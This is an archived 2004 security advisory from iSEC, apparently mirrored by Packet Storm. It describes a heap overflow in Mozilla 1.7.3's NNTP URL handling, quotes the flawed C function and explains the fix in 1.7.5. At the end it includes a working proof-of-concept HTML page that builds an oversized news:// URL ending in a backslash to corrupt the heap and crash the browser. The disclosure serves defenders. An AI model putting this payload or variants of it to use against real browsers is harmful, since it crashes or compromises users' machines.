isec-0020-mozilla.txt

2005-01-02T00:00:00
ID PACKETSTORM:35564
Type packetstorm
Reporter Maurycy Prodeus
Modified 2005-01-02T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Synopsis: Heap overflow in Mozilla Browser <= 1.7.3 NNTP code.  
Product: Mozilla Browser  
Version: <= 1.7.3  
Vendor: http://www.mozilla.org/  
URL: http://isec.pl/vulnerabilities/isec-0020-mozilla.txt  
CVE: not assigned  
Author: Maurycy Prodeus <z33d@isec.pl>  
Date: Dec 29, 2004  
  
  
  
Issue:  
======  
  
A critical security vulnerability has been found in Mozilla Project code  
handling NNTP protocol.  
  
  
Details:  
========  
  
Mozilla browser supports NNTP urls. Remote side is able to trigger news://  
connection to any server. I found a flaw in NNTP handling code which may  
cause heap overflow and allow remote attacker to execute arbitrary code on  
client machine.  
  
Bugus function from nsNNTPProtocol.cpp:  
  
char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)  
329 {  
330 char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 1);  
331 if (result)  
332 {  
333 char *resultPtr = result;  
334 while (1)  
335 {  
336 char ch = *commandSpecificData++;  
337 if (!ch)  
338 break;  
339 if (ch == '\\')  
340 {  
341 char scratchBuf[3];  
342 scratchBuf[0] = (char) *commandSpecificData++;  
343 scratchBuf[1] = (char) *commandSpecificData++;  
344 scratchBuf[2] = '\0';  
345 int accum = 0;  
346 PR_sscanf(scratchBuf, "%X", &accum);  
347 *resultPtr++ = (char) accum;  
348 }  
349 else  
350 *resultPtr++ = ch;  
351 }  
352 *resultPtr = '\0';  
353 }  
354 return result;  
355 }  
  
When commandSpecificData points to last (next is NULL) character which  
is '\\' copying loop may omit termination of source char array and overflow  
result buffer.  
  
  
Affected Versions  
=================  
  
Mozilla Browser <= 1.7.3 with mozilla-mail  
  
Solution  
=========  
  
This bug is fixed in Mozilla 1.7.5. (Bug 264388)  
Mozilla developer Dan Veditz claims that it cannot be exploitable:  
"A '\' on the end will certainly trash memory, but at that point you're no  
longer reading attacker-supplied data;".  
  
On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code  
overflows the buffer using attacker-supplied data. I decided to make this  
bug public because Mozilla Team hasn't warned users.  
  
  
Exploitation  
============  
  
I have attached proof of concept HTML file which causes heap corruption  
and crashes Mozilla 1.7.3 browser (with mozilla-mail). News server must be  
existing and available.  
  
  
- --  
Maurycy Prodeus  
iSEC Security Research  
http://isec.pl/  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.0.7 (GNU/Linux)  
  
iD8DBQFB0yG+C+8U3Z5wpu4RAp8qAKCitfHBZ3P83KX9noILeElskR7TGQCeLhGt  
91jIwGcqBiuRNNFc3xvcuog=  
=51XF  
-----END PGP SIGNATURE-----  
  
  
PROOF OF CONCEPT:  
  
<html>  
<script>  
i = "news://news.individual.net/AAAAAAAAAAAAAA?";  
for(l = 0; l < 16376; l++)  
i=i+"A";  
i=i+"/?profile/";  
for(l = 0; l < 16384; l++)  
i=i+"A";  
i=i+"\\";  
window.open(i);  
</script>  
</html>  
`